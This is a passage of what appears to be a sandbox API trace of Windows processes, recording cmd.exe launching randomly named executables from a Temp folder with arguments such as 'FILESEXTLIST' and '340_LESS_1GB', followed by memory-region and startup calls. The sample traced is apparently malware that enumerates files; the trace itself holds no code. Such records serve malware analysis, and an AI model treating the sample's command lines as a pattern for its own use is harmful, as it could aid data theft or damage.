returned -80 [0111.969] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0111.969] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0111.969] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0111.969] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0111.969] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0111.969] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0111.969] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0111.969] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0111.969] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0111.969] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0111.969] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0111.969] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0111.969] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0111.970] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0111.970] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0111.970] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0111.970] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0111.970] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0111.970] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0111.970] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0111.970] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0111.970] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0111.970] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0111.970] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0111.970] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0111.970] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0111.970] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0111.970] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0111.970] SetErrorMode (uMode=0x0) returned 0x0 [0111.970] SetErrorMode (uMode=0x1) returned 0x0 [0111.970] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x3b0848, lpFilePart=0x1ced9c | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x1ced9c*="Temp") returned 0x23 [0111.970] SetErrorMode (uMode=0x0) returned 0x1 [0111.970] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0111.971] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.973] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.973] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", fInfoLevelId=0x1, lpFindFileData=0x1ceb38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb38) returned 0x3b21d0 [0111.974] FindClose (in: hFindFile=0x3b21d0 | out: hFindFile=0x3b21d0) returned 1 [0111.974] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0111.974] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0111.974] GetConsoleTitleW (in: lpConsoleTitle=0x1cf010, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.046] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cee98, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cef60 | out: lpAttributeList=0x1cee98, lpSize=0x1cef60) returned 1 [0112.046] UpdateProcThreadAttribute (in: lpAttributeList=0x1cee98, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cef58, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cee98, lpPreviousValue=0x0) returned 1 [0112.046] GetStartupInfoW (in: lpStartupInfo=0x1cee54 | out: lpStartupInfo=0x1cee54*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0112.046] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0112.047] lstrcmpW (lpString1="\\GYm4NxCU.exe", lpString2="\\XCOPY.EXE") returned -1 [0112.048] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ceef4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cef40 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", lpProcessInformation=0x1cef40*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdb0, dwThreadId=0xdb4)) returned 1 [0112.968] CloseHandle (hObject=0x4c) returned 1 [0112.968] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0112.968] GetEnvironmentStringsW () returned 0x3b2dd0* [0112.968] FreeEnvironmentStringsW (penv=0x3b2dd0) returned 1 [0112.968] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0116.070] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cee34 | out: lpExitCode=0x1cee34*=0x0) returned 1 [0116.070] CloseHandle (hObject=0x50) returned 1 [0116.070] _vsnwprintf (in: _Buffer=0x1cef7c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cee40 | out: _Buffer="00000000") returned 8 [0116.070] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0116.070] GetEnvironmentStringsW () returned 0x3b2530* [0116.070] FreeEnvironmentStringsW (penv=0x3b2530) returned 1 [0116.070] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0116.070] GetEnvironmentStringsW () returned 0x3b2530* [0116.071] FreeEnvironmentStringsW (penv=0x3b2530) returned 1 [0116.071] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cee98 | out: lpAttributeList=0x1cee98) [0116.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.071] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0116.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.071] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0116.071] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.071] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0116.071] SetConsoleInputExeNameW () returned 0x1 [0116.071] GetConsoleOutputCP () returned 0x1b5 [0116.071] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0116.071] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.071] exit (_Code=0) Process: id = "41" image_name = "bkm66byk.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe" page_root = "0x7ea16840" os_pid = "0xd5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0xd2c" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6942 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6943 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6944 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 6945 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "bkm66byk.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe") Region: id = 6946 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6947 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6948 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6949 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 6950 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 6951 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6952 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6953 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6954 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 6955 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6956 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 6957 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6958 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6959 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6960 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 6961 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6962 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 6963 start_va = 0x490000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 6964 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6965 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7013 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7014 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 7015 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 7016 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 7017 start_va = 0x1270000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 7158 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 7159 start_va = 0x1270000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 7160 start_va = 0x13b0000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 7166 start_va = 0x13c0000 end_va = 0x149efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013c0000" filename = "" Region: id = 7167 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 7168 start_va = 0x1c0000 end_va = 0x1c2fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 7169 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Thread: id = 69 os_tid = 0xd60 [0112.054] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x80cc0520, dwHighDateTime=0x1d440a9)) [0112.054] GetCurrentProcessId () returned 0xd5c [0112.054] GetCurrentThreadId () returned 0xd60 [0112.054] GetTickCount () returned 0x26d52 [0112.054] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=16884285547) returned 1 [0112.054] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0112.054] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0112.055] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0112.055] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0112.055] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0112.055] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0112.055] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0112.056] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0112.056] GetCurrentThreadId () returned 0xd60 [0112.056] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13b07d0)) [0112.056] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0112.056] GetFileType (hFile=0x3) returned 0x0 [0112.056] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.056] GetFileType (hFile=0x7) returned 0x0 [0112.056] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0112.056] GetFileType (hFile=0xb) returned 0x0 [0112.056] SetHandleCount (uNumber=0x20) returned 0x20 [0112.056] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.056] GetEnvironmentStringsW () returned 0x20fc88* [0112.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0112.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x13b11f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0112.057] FreeEnvironmentStringsW (penv=0x20fc88) returned 1 [0112.057] GetLastError () returned 0x6 [0112.057] SetLastError (dwErrCode=0x6) [0112.057] GetLastError () returned 0x6 [0112.057] SetLastError (dwErrCode=0x6) [0112.057] GetLastError () returned 0x6 [0112.057] SetLastError (dwErrCode=0x6) [0112.057] GetACP () returned 0x4e4 [0112.057] GetLastError () returned 0x6 [0112.057] SetLastError (dwErrCode=0x6) [0112.057] IsValidCodePage (CodePage=0x4e4) returned 1 [0112.057] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0112.057] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0112.057] GetLastError () returned 0x6 [0112.057] SetLastError (dwErrCode=0x6) [0112.057] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.057] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0112.057] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0112.058] GetLastError () returned 0x6 [0112.058] SetLastError (dwErrCode=0x6) [0112.058] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.058] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䶳氀ശAĀ") returned 256 [0112.058] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䶳氀ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0112.058] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" 